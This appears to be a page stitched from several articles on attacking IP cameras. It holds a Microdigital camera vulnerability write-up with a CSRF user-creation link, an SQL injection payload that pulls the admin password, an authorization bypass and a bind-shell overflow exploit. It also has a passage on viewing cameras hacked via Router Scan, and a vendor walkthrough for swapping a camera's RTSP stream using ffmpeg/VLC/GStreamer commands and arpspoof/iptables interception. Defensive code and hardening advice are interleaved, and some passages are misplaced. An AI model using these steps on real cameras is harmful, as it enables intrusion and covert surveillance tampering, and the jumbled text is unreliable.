The user password is stored in the Password column in unencrypted form, so an attacker with access to the database can obtain the administrator's password and try it on the other available services.

We move on to the PHP scripts. The web directory /root/httpd/hdtocs/web holds three scripts: Download.php, login.php and Upload.php.

The file login.php is not particularly interesting, since PHP is used there only to configure the ActiveX component needed by the browser add-ons that stream video on the site.

The file Download.php accepts the name of a file to download, checks its extension and, if such a file is found in the folder UpdownLoad, sends its contents in response.

The script does not check the file name, so if someone ever decides to put an executable script into this directory, its contents will be returned on request (note the variable $FILE_TYPE, which will be empty in the case of an unknown extension).

The last file, Upload.php, was not without bugs either: it allows sending not only files with an extension from the whitelist (.dat and .dat), but also files with an empty extension.

The extension whitelist is set as follows.

Now, if the extension value is not empty, it is checked against the array derived from $allowext. The comma is used as a separator.

But if the extension is empty, execution never reaches this condition and the check is not performed. For exploitation, however, this bug is useless.

But the next bug found by chance in this script should be regarded as a vulnerability: there is no check on the length of the file name. On its own that may not look like a serious problem, but at the start of the program a Bash script is launched.

It clears the directory UpdownLoad of previously uploaded files, and in the Bash interpreter included in BusyBox the length of a file name is limited to 256 characters. It turns out that the script cannot delete files whose names are longer than this value.

Since Upload.php has no authorization, any user can upload any number of files with names longer than 256 characters, and this will fill the entire memory of the device. In other words, denial of service.

An example of uploading a file.

And a listing of the files in the directory /UpdownLoad/ through the bash console.

With this we can finish studying the PHP scripts and move on to the largest part of the study: the CGI applications.

CGI applications on IP cameras are responsible for almost all actions in the administrator's web panel, from authorization to updating the device.

I split the description of the work into testing with the "naked eye" (vulnerabilities that can be found without reversing the executable files) and the actual reversing of those binaries.

Testing with the "naked eye" turned up two vulnerabilities. The first allows cross-site request forgery attacks (CSRF). Its essence is that social engineering can be used to make the administrator follow a malicious link. This makes it possible to perform almost any command from the admin interface. For example, you can make this link:

/WebParam?User&Action=Set&Param=Add&id=Tester&Pass=CGFZC3DVCMQ=&authority=0&t=1552491782708

It will create the user Tester with the password Password.

When I studied the traffic in Burp Suite, for a long time I could not find the server response in which the browser is sent a cookie with the authorization data (Username, Auth and Password). It turned out I was looking in vain: these values are set on the client side by JavaScript code in the file /inc/js/ui.js.

That is, the browser first makes a request to check the login and password and, if the result is positive, saves the login, password and privileges in the corresponding cookies. These cookies are then used when sending command requests, for example when creating a new user.

This is also where the second vulnerability appears: even if we do not send the Password cookie, the server will still successfully process our request!

That is, it is enough to know the admin login (which by default is root) to bypass authorization and make any calls available to the administrator in the camera's administrative web console! And we found this without even studying the application code. Let's see what the code itself holds.

Studying binary applications

To explore executable files, some preparations were required. Namely:

  • installing a statically compiled GDB debugger from public repositories on GitHub;
  • installing a MicroSD card with the VFAT file system (which provides additional space).

The process of studying compiled applications looks like this.

  1. Studying the application in IDA Pro.
  2. If necessary, debugging the application in GDB on the camera itself via Telnet. By the way, since the application is multi-threaded, I had to check the desired process ID every time to interact with a specific thread (the thread is created before the request is processed).
  3. Writing a proof of concept to demonstrate the vulnerability.

Almost all command web requests went to the address /WebParams. Having studied the httpd settings stored in the file /usr/local/httpd/conf/httpd.conf, we determine that all requests to /WebParam are redirected to the executable FCGI file at /usr/local/httpd/fcgi/webparams.fcgi.

And now imagine what this can lead to if the attacker is a professional in his field. All the results obtained with bots can be added to his database and then used to launch a dictionary brute-force attack. Believe me, the success rate of such attacks will be ten times higher!

This is an executable file for 32-bit ARM. I decided to concentrate on it.

Arbitrary FTP commands

The camera can send recordings to a remote FTP server. There is a separate web form for configuring the connection.

Next, you can click the Test button and check the connection. This calls the function at 0xaEB0. For convenience, we will study the pseudocode of the function obtained with the Hex-Rays Decompiler.

  1. Creating a connection.

  2. Authorization on the FTP server.

  3. Changing the current directory to the value passed in the argument.

  4. Creating a temporary file.

A security problem shows up already at the third step. The function FTP_CWD at offset 0xa9f0 does not check the path string for invalid characters, such as a line break.

This makes it possible to send arbitrary FTP commands: it is enough to add the bytes \r\n to the value of the directory for uploading files. So we found SSRF.

For example, you can make a request to the camera's FTP server and add to it a command that creates the directory /tmp/123 (the GET variable UploadPath is the one responsible for the path to the required directory).

Go to /tmp/ on the camera and see the created folder 123.
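The missing check in the CWD step, written out as an added example (not code from the camera firmware or from the original article). The function names are hypothetical and both input strings are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Function and enum names here are hypothetical, not the firmware's. */
enum ftp_status { FTP_OK = 0, FTP_EMPTY, FTP_CTRL_BYTE, FTP_TOO_LONG };

/* An FTP command is one line terminated by CRLF, so a path must not
 * contain CR, LF or any other control byte (0x01-0x1F, 0x7F). */
enum ftp_status ftp_check_path(const char *path)
{
    const unsigned char *p;

    if (path == NULL || path[0] == '\0')
        return FTP_EMPTY;
    for (p = (const unsigned char *)path; *p != '\0'; p++) {
        if (*p < 0x20 || *p == 0x7f)
            return FTP_CTRL_BYTE;
    }
    return FTP_OK;
}

/* Builds exactly one "CWD <path>\r\n" line. On any error `out` is left
 * empty, so the caller has nothing it could send by mistake. */
enum ftp_status ftp_build_cwd(const char *path, char *out, size_t outlen)
{
    enum ftp_status st;
    int n;

    if (out == NULL || outlen == 0)
        return FTP_TOO_LONG;
    out[0] = '\0';
    st = ftp_check_path(path);
    if (st != FTP_OK)
        return st;
    n = snprintf(out, outlen, "CWD %s\r\n", path);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return FTP_TOO_LONG;
    }
    return FTP_OK;
}

/* Number of CRLF-terminated command lines in a buffer. */
size_t ftp_count_commands(const char *buf)
{
    size_t lines = 0;

    for (; buf[0] != '\0'; buf++) {
        if (buf[0] == '\r' && buf[1] == '\n')
            lines++;
    }
    return lines;
}

int main(void)
{
    /* Constructed inputs: a normal upload directory, and one with an
     * embedded line break followed by a second command. */
    const char *inputs[] = { "/recordings/cam1",
                             "/recordings\r\nMKD /tmp/123" };
    char cmd[64];
    size_t i;

    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        enum ftp_status st = ftp_build_cwd(inputs[i], cmd, sizeof cmd);
        printf("input %zu: status=%d, commands to send=%zu\n",
               i, (int)st, ftp_count_commands(cmd));
    }
    return 0;
}
```

The same check belongs on every value that ends up in an FTP command line (user name, password, file name), not only on the directory.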

Path Traversal and checking file availability

The next feature of the web server is clock synchronization via the NTP protocol.

Changing the parameters is handled by the function at offset 0x12564. We will not go into detail about how it works and will only pay attention to the variable Tz (time zone).

  1. The first 32 bytes of the GET parameter Tz are stored in the variable get_tz_32b.

  2. The value is concatenated with the path to the directory where the time zone settings are stored, and the device's file system is checked for the presence of such a directory (or file).

  3. If the check succeeds, various actions follow that take time to execute, for example database queries.

If you combine all three points, it turns out that we can not only manipulate the full path of the directory (path traversal), but also tell from the server's response whether a file is present in the file system. To make sure, we send a request that checks whether the file /etc/passwd exists.

And let's see what happens if the file does not exist.
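A validator for the Tz value that closes the traversal described above, as an added example (not the firmware's code). The function names and the zone directory /usr/share/zoneinfo are assumptions, since the page does not name the camera's directory; the sample values are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed location of the zone files; the page does not give the
 * camera's directory name. */
#define TZ_BASE_DIR "/usr/share/zoneinfo"
#define TZ_MAX_LEN  31   /* the handler described above keeps 32 bytes */

/* Accepts names such as "Europe/Moscow" or "Etc/GMT+3": components of
 * ASCII letters, digits, '_', '+', '-' separated by single '/'.
 * '.' is not allowed at all, which rules out "." and ".." components. */
int tz_name_is_valid(const char *tz)
{
    size_t i, len, comp_len = 0;

    if (tz == NULL)
        return 0;
    len = strlen(tz);
    if (len == 0 || len > TZ_MAX_LEN)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)tz[i];

        if (c == '/') {
            if (comp_len == 0)      /* leading '/' or empty component */
                return 0;
            comp_len = 0;
        } else if (c < 0x80 &&
                   (isalnum(c) || c == '_' || c == '+' || c == '-')) {
            comp_len++;
        } else {
            return 0;               /* '.', '\\', '%', control bytes */
        }
    }
    return comp_len > 0;            /* no trailing '/' */
}

/* Returns 0 and writes the zone file path, or -1 when the name is
 * rejected. A rejected name never reaches the file system, so the
 * response cannot reveal whether some other file exists. */
int tz_build_path(const char *tz, char *out, size_t outlen)
{
    int n;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (!tz_name_is_valid(tz))
        return -1;
    n = snprintf(out, outlen, "%s/%s", TZ_BASE_DIR, tz);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample values for the Tz parameter. */
    const char *samples[] = { "Europe/Moscow", "Etc/GMT+3",
                              "../../../etc/passwd", "/etc/passwd" };
    char path[128];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = tz_build_path(samples[i], path, sizeof path);
        printf("%-22s -> %s\n", samples[i], rc == 0 ? path : "rejected");
    }
    return 0;
}
```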

SQL injection in webcam

We move on to more serious vulnerabilities. The camera's configuration is stored in an SQLite 3 database, and almost all actions on the web server lead to interaction with it. It turned out that almost all database requests with string parameters can be passed incorrectly formatted input. And this, as you could guess, is SQL injection! As an example, we will analyze one of the vulnerable forms: the form for editing the DNS settings.

When these parameters are edited, two requests are sent to the server: a request to modify the information and a request to fetch the current settings.

An example of a request to modify the information.

Such a request is processed by the function at offset 0x18374. First it reads the request parameters (up to 32 bytes each) and checks whether they are filled in.

Next comes a call to the function Strip, which removes space and tab characters at the beginning and at the end of the strings.

Now the resulting strings go to the function that makes the SQL UPDATE request to the SQLite 3 database.

The problem is that the strings are passed not with %q (the safe option) but with %s, which lets us break out of the string and add our own SQL instructions to the query (by the way, if an integer parameter is sent, it is best to use %d).

Below is an example of exploitation.

During the processing of this query, the following SQL command is created.

Update Network set ddnsusage=1, ddnshostname='', ddnsname=(select /*', ddnsname='*/ password from /*', ddnsusername='*/ user limit 1) -- ', ddnspassword='***'

This query writes the plaintext password of the first account in the User table into the ddnsname field. All that remains is to request the current DDNS settings.

As a result, we got the password of the first user from the User table, in our case root / root. Considering that before this we found a way to bypass authorization, it turns out that any unauthorized user can learn the admin password.

A similar problem can be observed in 25 different GET parameters scattered throughout the web server (some of the parameters need to be Base64-encoded first).
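What the difference between %s and %q means for the statement text, as an added example (not the firmware's code): sql_escape_q is a hand-written stand-in for SQLite's %q conversion, which doubles single quotes, and the inputs are constructed. In real code the job belongs to sqlite3_mprintf() with %q or %Q, or to a prepared statement with sqlite3_bind_text().

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for SQLite's %q: copies `in`, doubling every single quote.
 * Returns the output length, or -1 if `out` is too small. */
int sql_escape_q(const char *in, char *out, size_t outlen)
{
    size_t o = 0;

    if (in == NULL || out == NULL || outlen == 0)
        return -1;
    for (; *in != '\0'; in++) {
        size_t need = (*in == '\'') ? 2 : 1;

        if (o + need >= outlen) {       /* keep room for the NUL */
            out[0] = '\0';
            return -1;
        }
        if (*in == '\'')
            out[o++] = '\'';
        out[o++] = *in;
    }
    out[o] = '\0';
    return (int)o;
}

/* Builds an UPDATE on two of the columns named on the page. With
 * escape == 0 the values are pasted as with %s; with escape != 0 they
 * go through sql_escape_q first. Returns the length or -1. */
int build_update(const char *host, const char *name, int escape,
                 char *out, size_t outlen)
{
    char h[80], n[80];   /* 32-byte parameters fit even when doubled */
    int w;

    if (escape) {
        if (sql_escape_q(host, h, sizeof h) < 0 ||
            sql_escape_q(name, n, sizeof n) < 0)
            return -1;
    } else {
        if (strlen(host) >= sizeof h || strlen(name) >= sizeof n)
            return -1;
        strcpy(h, host);
        strcpy(n, name);
    }
    w = snprintf(out, outlen,
                 "UPDATE network SET ddnshostname='%s', ddnsname='%s'",
                 h, n);
    return (w < 0 || (size_t)w >= outlen) ? -1 : w;
}

/* Counts SQL string literals in a statement ('' inside a literal is an
 * escaped quote). Two parameters must yield exactly two literals;
 * returns -1 for an unterminated literal. */
int sql_count_literals(const char *sql)
{
    int count = 0, in_literal = 0;

    for (; *sql != '\0'; sql++) {
        if (*sql != '\'')
            continue;
        if (!in_literal) {
            in_literal = 1;
        } else if (sql[1] == '\'') {
            sql++;                      /* skip the escaped quote */
        } else {
            in_literal = 0;
            count++;
        }
    }
    return in_literal ? -1 : count;
}

int main(void)
{
    const char *host = "x', ddnsusage='0";   /* constructed input */
    char q[256];

    build_update(host, "n", 0, q, sizeof q);
    printf("%%s: %s (literals: %d)\n", q, sql_count_literals(q));
    build_update(host, "n", 1, q, sizeof q);
    printf("%%q: %s (literals: %d)\n", q, sql_count_literals(q));
    return 0;
}
```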

Stack overflow

While I was writing out the parameters susceptible to SQL injection attacks, my attention was drawn to the function that processes the variable Action, at offset 0x155d0. The beginning of the function's pseudocode is in the screenshot.

On line 78 the function Get_val is called. It takes the name of a GET variable as a string argument and returns the string value of that variable.

Next the function strcat is called, which takes two pointers to strings and writes the result of concatenating the two strings to the first pointer. The problem is that strcat can cause a buffer overflow. The error occurs when the memory allocated on the stack for the first variable is not enough to hold the result of joining the two strings, and the stack overflows.

The first argument of the function was declared on line 53.

Four bytes are allocated for this string, and then a zero byte is placed in the first cell to mark its end.

It turns out that, to overflow the stack, two strings have to be passed in the arguments of strcat, with the second string longer than three bytes (the fourth byte is zero and is set automatically).

We move on to exploiting the vulnerability found. To begin with, check which protections are enabled for the executable file.

The NX flag is disabled, which means code can be executed from any area of memory, including code that we place there ourselves in the course of the work.

We also check whether address randomization is enabled in the system.

The flag is 1, which means that the stack address will be random each time. But the second argument of strcat (that is, the value of the GET variable Action) is initially written to the heap, and therefore we can use it.

While debugging the program, it turned out that the return address of the function that calls strcat is stored at an offset of 52 bytes.

You can verify this by sending the following request.

When debugging the process of the executable file WebParam.fcgi, we get a program error: it tries to jump to the address BBBB.

Now it remains to add the executable code (shellcode) after the return address and overwrite the return address with the address of our malicious code, which is stored on the heap. The example uses executable code that opens port 10240 and gives access to the command shell without authorization (bind shell).

Request with overwriting the return address to the address of the shell-code (0x00058248)

Checking network activity on the device.

Process 1263 of the program WebParam.fcgi has started listening on port 10240 on all interfaces. We connect to it with Netcat.

The shell is available with the privileges of the user nobody.

There is a similar buffer overflow problem with the variable Params. The method of exploitation differs little from the one described, so we will not dwell on it.

Firmware file substitution

One of the most common problems of IoT devices is the lack of a signature on the firmware file. Of course, this camera did not escape it either. And how can this be used? It is simple: we can add our own code to the device's firmware and thus infect it, in such a way that recovery is possible only with a memory dump, which (like the necessary skills) far from every owner has.

Device administrators have an interface for updating the firmware (at the bottom of the page).

It is time to remember the firmware file that we downloaded from the official site at the very beginning of the article.

It is a .tar containing the files PackageInfo.txt and UpdatePackage_6400.0.8.5.bin. The second, in turn, turned out to be an archive.

After unpacking, we saw the following file hierarchy.

The directories hold the same files as the camera's file system. That is, we can replace one of them, repack the firmware and send it as an update. But we need to look into the file PackageInfo.txt, available after the first unpacking.

The eighth line contains the checksum of the .bin file. That is, this field also has to be edited when sending custom firmware, otherwise the camera will consider the file damaged and the update system will ignore it. This vulnerability can be classified as RCE: remote execution of arbitrary system commands.

How to hack the webcam with privilege escalation

Finally, another vulnerability of the same type, but this time with privilege escalation to root! If you insert a MicroSD card into the camera, files on it can be deleted from the web interface.

When a file is deleted, the browser sends the following request over HTTP.

On the server side the request is handled by the same application, WebParam.fcgi, but in this case it passes the request on to another program, MainProc. This is also a binary application.

Having studied MainProc, I determined that the GET variable FileName is concatenated with a string and passed to the function system without any filtering. This means that arbitrary code can be executed on behalf of the user who launched MainProc, that is, root.

Proof of concept: create the file /tmp/test.txt containing the string Hacking.

Combined with the authorization bypass, this bug allows an attacker to gain control over any camera with an open web interface and, quite likely, to use it for further attacks.
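How the delete operation can be done without a shell at all, as an added example (not MainProc's code): the name is checked to be a single path component and then handed to unlink(), so shell metacharacters in FileName have no meaning. The function names, the directory argument and the sample names are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical names; the mount point of the card is passed in by the
 * caller because the page does not give it. */
enum sd_status { SD_OK = 0, SD_BAD_NAME = -1, SD_UNLINK_FAILED = -2 };

/* A deletable name is one path component: not empty, not "." or "..",
 * no '/', no control bytes, at most 255 bytes. */
int sd_name_is_plain(const char *name)
{
    size_t i, len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 255)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];

        if (c == '/' || c < 0x20 || c == 0x7f)
            return 0;
    }
    return 1;
}

/* Deletes dir/name with unlink(). No command line is built, so
 * characters such as ';', '|', '$' or '`' are just bytes of a name. */
int sd_delete(const char *dir, const char *name)
{
    char path[512];
    int n;

    if (dir == NULL || !sd_name_is_plain(name))
        return SD_BAD_NAME;
    n = snprintf(path, sizeof path, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= sizeof path)
        return SD_BAD_NAME;
    if (unlink(path) != 0)
        return SD_UNLINK_FAILED;
    return SD_OK;
}

int main(void)
{
    /* Constructed demo: a scratch directory stands in for the card. */
    char dir[64], path[128];
    const char *names[] = { "clip.avi", "../../etc/passwd",
                            "clip.avi; echo x" };
    FILE *f;
    size_t i;

    snprintf(dir, sizeof dir, "/tmp/sd_demo_%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0)
        return 1;
    snprintf(path, sizeof path, "%s/clip.avi", dir);
    f = fopen(path, "w");
    if (f != NULL)
        fclose(f);
    for (i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-20s -> %d\n", names[i], sd_delete(dir, names[i]));
    rmdir(dir);
    return 0;
}
```

Running the file-management code under an unprivileged account instead of root limits what any remaining bug in it can reach.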

How to hack a web camera - Results

During the study, more than ten different vulnerabilities, including critical ones, were discovered in Microdigital IP cameras. The full list of twelve CVEs can be found at the link.

An important point is that the firmware file provided by the manufacturer on the site is common to all six IP cameras of the N series. And most likely some of the vulnerabilities found are present in other Microdigital devices, of which, as mentioned at the beginning of the article, there are "over 150 models"!

It is also worth mentioning that the Positive Hack Days 8 conference held a contest on hacking IP cameras, Cambreaker. This model was among the test devices. One of the winners of the competition was Ivan Anisena, who, as it turned out, last year found a vulnerability allowing arbitrary SQL queries and used it to bypass authorization on this camera.

A burning question remains: how to protect the perimeter from intruders if there is a camera like this in it? To ensure safety you need to:

  • install the camera in a place physically inaccessible to an attacker;
  • carefully study the documentation;
  • disable unused services, such as FTP;
  • change all passwords and, preferably, the device usernames;
  • close port forwarding to the IP camera on the gateway side (most often the router acts as the gateway).

The same list of recommendations can be followed when setting up any other smart device.

IP Camera - Connection and View

The last program from the archive, IVMS-4200 (V2.8.2.2_ML), is used to view webcams. Install it on your computer and run it.

After starting, go to the Control Panel tab - "Device Management" - "Add". For the IP camera to work correctly, fill in:

  • Pseudonym - any name;
  • Address - IP address of the camera;
  • Port - leave unchanged: 8000;
  • User - login for the IP camera;
  • Password - password for the IP camera.

Where to get the address, login and password is shown in the pictures below. After entering them, click the "Add" button. Go to the tab "Control Panel" - "Main View".

So that this does not happen to you and your video surveillance system does not get hacked, start looking into this issue, treat it responsibly and ensure the safety of all your network equipment.

If everything is done correctly, the hacked IP camera will appear in the IVMS-4200 interface. If there is nothing on the screen, try the next IP camera address from the Router Scan program.

Fans of the film "Ocean's Eleven" probably recognized the frame we chose to illustrate this article. The moment when the cool guys skillfully replaced the analog signal of the casino's video surveillance cameras stuck in many minds. Some even try to pull this off in real life.

Technical editor of the company RUCAM-VIDEO.

Technologies have changed: IP cameras are now preferred over analog ones, and the methods of hacking them are discussed in detail below.

Just because you are not paranoid does not mean you are not being watched

Most people who engage in hacking do it for entertainment or to get a bit of fame on the Internet. They use well-known "holes" in camera security systems and post what they consider funny videos on popular Internet resources. YouTube is simply teeming with such videos.


We will consider the more serious consequences of the vulnerability, namely when the attacker does not reveal himself or his penetration into the system. Such an attack is usually carefully planned in advance, a week or even a month before the break-in.

As in our "Ocean's Eleven" example, it will be about replacing the stream in video surveillance systems, only not an analog signal but a digital one, namely the RTSP stream.

Since all information in this article is informational in nature and is primarily aimed at eliminating security mistakes when building a video surveillance system, we do not recommend using the vulnerability considered below. That is why breaking into the video surveillance network itself is covered only superficially, and the methods described assume open access to the network of an enterprise or private individual. Remember that unauthorized access to data may be prosecuted.

Our company's experience shows that the topic is very relevant, since at the commissioning stage of a video surveillance system many people connect cameras to their system by RTSP links. Whether to save time, out of ignorance, or out of confidence that this is how it should be, many do not even think about changing passwords or looking at which security settings their camera supports.

By the way, RTSP (Real Time Streaming Protocol) is a protocol that allows you to control streaming video in real time. All we need to know about it is that RTSP links are what we will use to pick up the video stream from the camera.

We got finally to


, namely, the plan for which we will act:

1. Obtaining the RTSP links for the camera whose stream we want to replace.

2. Preparing a video file for subsequent broadcast.

3. Broadcasting the recorded file.

4. Protection against stream substitution.

Getting the RTSP stream URI

To replace the signal from the camera, you first need to find the video stream we need. This requires a link to it using the RTSP protocol. The camera usually transmits several images (high and low resolution). The first is used for recording, and the second for broadcasting to the video surveillance screens. The minimum resolution (most often 320 by 240 pixels) reduces the load on the equipment. The links for the individual RTSP streams often differ by a single digit in the key.

Different cameras can have different RTSP links, but the general form is approximately as follows:

rtsp://[login:password@]IP address:RTSP port[/key]


Explanation:

  • the login and password are those used to access the camera (they may be absent);
  • if the link specifies a login and password, the @ symbol follows them to separate the authorization data from the IP address;
  • the RTSP port is the one over which streaming video control commands are transmitted; the default value is 554;
  • the key is a unique part of the RTSP link, which may vary depending on the manufacturer and camera model, for example:

/Play1.sdp - the stream number is given in place of "1";

/live/ch00_0 - 00 is the channel number, 0 is the stream number;

/Channel1 - the stream number is given in place of "1".

How to find out the RTSP link without having access to the camera?



A few simple ways:

1. Find the link on the camera manufacturer's website.

2. Search the Internet for sites that give links for different camera models. Examples of such sites:



Recording the RTSP stream to a file
Once we have the necessary RTSP links, we need to record the video broadcast over them, several hours long. Do not forget that modern systems use two streams, so both streams need to be recorded at the same time.
A video stream can be recorded over the RTSP protocol with various software. Consider the most popular:

ffmpeg, gstreamer and vlc
1. Recording the stream via FFmpeg

$ man ffmpeg

We are interested in:

  • -vcodec copy - copying video to the file;
  • -acodec copy - copying audio to the file;
  • -rtsp_transport tcp - selecting the stream transmission method;
  • -r 25 - setting the frame rate per second;
  • -copyts - copying timestamps;
  • -start_at_zero - copying timestamps starting from 00:00:00:000.

We substitute our RTSP link and, after the copy options, specify the path and name of the file the recording will go to:

% ffmpeg -i rtsp://<camera-IP>:554/snl/live/1/1 -copyts -start_at_zero -rtsp_transport tcp -r 25 -vcodec copy -acodec copy /home/line/example/1.avi

Recording to the file has started.

2. Recording via VLC

Get acquainted with the set of commands that the VLC media player offers by running $ vlc -h:
  • :sout=#file{path} - specify the file to which the video is copied;
  • --rtsp-tcp - receive RTSP over TCP;
  • --rtsp-frame-buffer-size=1000 - buffer so that the video does not break up during playback;
  • --h264-fps=25 - setting of 25 frames per second.

We substitute our data and run:

$ cvlc rtsp://<IP address>:554/snl/live/1/1 --rtsp-tcp --rtsp-frame-buffer-size=1000 --h264-fps=25 :sout=#file{dst=/home/line/example/1.avi}

The VLC window opens and recording starts; when you close the window, recording stops.

3. Recording through GStreamer

Information on working with GStreamer can be found here.
  • rtspsrc location="rtsp://<IP address>:554/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif" - specify the RTSP stream as the data source.
  • rtph264depay - in RTSP the video arrives in small pieces (RTP packets); rtph264depay extracts the video from these packets.
  • h264parse - as the name suggests, parses the H.264 stream.
  • avimux - assembles the stream into AVI; you can also use mp4mux or matroskamux (mkv).
  • filesink location=1.avi - specify the file to which the video will be saved.

gst-launch-1.0 -v rtspsrc location="rtsp://<IP address>:554/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif" ! rtph264depay ! h264parse ! mp4mux ! filesink location=1.mp4

RTSP stream broadcast from file

It is time to start broadcasting the recorded file in RTSP format. To do this, we use the same programs reviewed in the section above.

1. To broadcast the video stream with ffmpeg, you must use ffserver. Its description can be found here. To set the transmission parameters, fill in the ffserver.conf file:
  • RTSPPort - set the RTSP port number on which the broadcast will go.
  • <Stream snl/live/1/1> - after Stream, set the desired key.
  • Format rtp - the transmission format.
  • File "/home/line/example/1.avi" - specify the path to the file you want to transmit.
  • -rtsp_transport tcp - the key for transmitting via TCP.
  • NoAudio - do not pass the sound.

ffserver.conf:

RTSPPort 554
<Stream snl/live/1/1>
Format rtp
File "/home/line/example/1.avi"
-rtsp_transport tcp
NoAudio
</Stream>

Next, run % ffserver -f ffserver.conf.

2. Now use the VLC media player. Although this is the easiest way, VLC unfortunately can broadcast the stream only via the UDP protocol.

The command for running the RTSP stream:
  • --sout=#rtp{sdp=rtsp://<IP address>:554/snl/live/1/1} - set the link on which broadcasting will occur.
  • --repeat - if necessary, play the video file in a loop.

vlc /home/line/example/1.avi --sout=#rtp{sdp=rtsp://<IP address>:554/snl/live/1/1} --repeat

3. Finally, using GST-Server.


To begin with, it must be installed:

$ sudo apt-get install gstreamer1.0
$ wget <URL of the gst-rtsp-server-1.8.3 archive>
/gst-rtsp-server-1.8.3$ sudo apt install gtk-doc-tools
/gst-rtsp-server-1.8.3$ sudo apt-get install libgstreamer-plugins-base1.0-dev
/gst-rtsp-server-1.8.3$ make

Now we can change the file /gst-rtsp-server-1.8.3/examples/test-launch.c. Here you can change the RTSP port that is used by default, #define DEFAULT_RTSP_PORT "8554", and the key in the link, gst_rtsp_mount_points_add_factory (mounts, "/test", factory). After putting in our values, run make. Now run the test-launch file with the keys:
  • rtspsrc location="/home/line/example/1.avi" - path to the file that will be played.
  • H264 encoder - encode in H.264.
  • rtph264pay name=pay0 pt=96 - split our stream into pieces.

~/gst-rtsp-server-1.8.3/examples$ ./test-launch "( rtspsrc location="/home/line/example/1.avi" ! x264enc ! rtph264pay name=pay0 pt=96 )"

The recorded file is now broadcast in RTSP format, after which the task is to put the camera out of action. Below are several options that vary depending on the object being attacked. In fact there are many more ways; we consider only the most basic. The first thing needed is to get into the required network.

If the object is large geographically, it is often possible to approach some cameras physically and even try to find the switching equipment to which the camera is connected.

If the object is small, you can try to enter the network via Wi-Fi and scan it using nmap, for example.

Also, if there is physical access to the camera, a single-board computer can be used to break in, in several stages:

1) enable Wireshark recording;

2) briefly disconnect the wire from the camera and connect it to the single-board computer;

3) return the cable to its place;

4) examine the logs received.

Or, if there is access to the network, you can use the classic substitution method:

- using arpspoof, stand between the camera and the server;

- using ip_forward, forward requests from the video surveillance server to the IP camera, and vice versa;

- using iptables, redirect all requests for the RTSP port so that the video surveillance server is answered not by the camera but by our machine.

Protection of video surveillance cameras from hacking

To protect against the stream substitution described above, you can use several methods:


1. Integrating cameras

Integrating the camera into the software product gives the greatest protection. You can check whether your camera is integrated with the "Line" surveillance system. If your camera or manufacturer is not in the list, you can contact technical support with a request to integrate the IP camera model you use.

2. Update firmware

The firmware of the cameras must be kept up to date at all times, since developers use updates to fix various vulnerabilities and thereby make the cameras more stable.

3. Changing standard logins and passwords

The first thing an attacker will do is try the camera's standard login and password. They are listed in the operating instructions, so finding them is not difficult. Therefore, always use a unique login and password.

4. Enable mandatory authorization

This function is present in many modern cameras, but unfortunately not all users know about it. If you disable this option, the camera will not request authorization when someone connects to it, which makes it vulnerable to hacking. It is worth noting that there are cameras with dual authorization: for HTTP access and for access via the ONVIF protocol. Some cameras also have a separate setting that requests authorization when connecting via a direct RTSP link.
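Items 3 and 4 can be checked offline against the list of RTSP links configured in your own recorder or VMS. The following is an added example, not code from the original article: the function names and the sample inventory are hypothetical, and the password list is the set of standard passwords named on this page.

```python
from urllib.parse import urlsplit

# Standard passwords named on this page; extend with your vendors' defaults.
DEFAULT_PASSWORDS = {"admin", "888888", "123456", "12345", "1234"}
MIN_PASSWORD_LENGTH = 8   # the page treats anything shorter as weak
RTSP_DEFAULT_PORT = 554


def audit_rtsp_link(link):
    """Audit one rtsp://[login:password@]ip:port[/key] link; the label omits the password."""
    parts = urlsplit(link.strip())
    if parts.scheme.lower() != "rtsp" or not parts.hostname:
        return parts.hostname or "unparsed", ["not-an-rtsp-link"]
    try:
        port = parts.port or RTSP_DEFAULT_PORT
    except ValueError:
        return parts.hostname, ["invalid-port"]
    label = f"{parts.hostname}:{port}{parts.path}"
    findings = []
    if parts.username is None:
        # Nothing to verify offline: confirm on the camera itself that
        # authorization is required for direct RTSP links (item 4).
        findings.append("no-credentials")
    else:
        password = parts.password or ""
        if password.lower() in DEFAULT_PASSWORDS:
            findings.append("default-password")
        if len(password) < MIN_PASSWORD_LENGTH:
            findings.append("short-password")
    return label, findings


def audit_inventory(links):
    """Map each link's password-free label to its findings, skipping clean links."""
    report = {}
    for link in links:
        label, findings = audit_rtsp_link(link)
        if findings:
            report[label] = findings
    return report


# Constructed inventory: documentation addresses and made-up credentials.
SAMPLE_LINKS = [
    "rtsp://admin:12345@192.0.2.10:554/live/ch00_0",
    "rtsp://192.0.2.11/play1.sdp",
    "rtsp://viewer:T7w-qe9LmZx2@192.0.2.12:8554/channel1",
    "http://192.0.2.13/index.html",
]

print(audit_inventory(SAMPLE_LINKS))
```

A "no-credentials" finding is not proof of an open stream; it marks the cameras whose authorization setting has to be checked by hand.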

5. Filter IP addresses

If the camera supports a so-called white list, it is better not to neglect it. The white list defines the IP addresses from which connections to the camera are allowed. These must be the address of the server to which the camera is connected and, if necessary, a second IP address of the workstation from which the camera is configured. But this is not the most reliable method, since an attacker who swaps in their own device can use the same IP address. Therefore, it is best to use this option together with the rest of the recommendations.

6. Network protection

You must configure the switching equipment correctly. Most switches now support protection against ARP spoofing; be sure to use it.
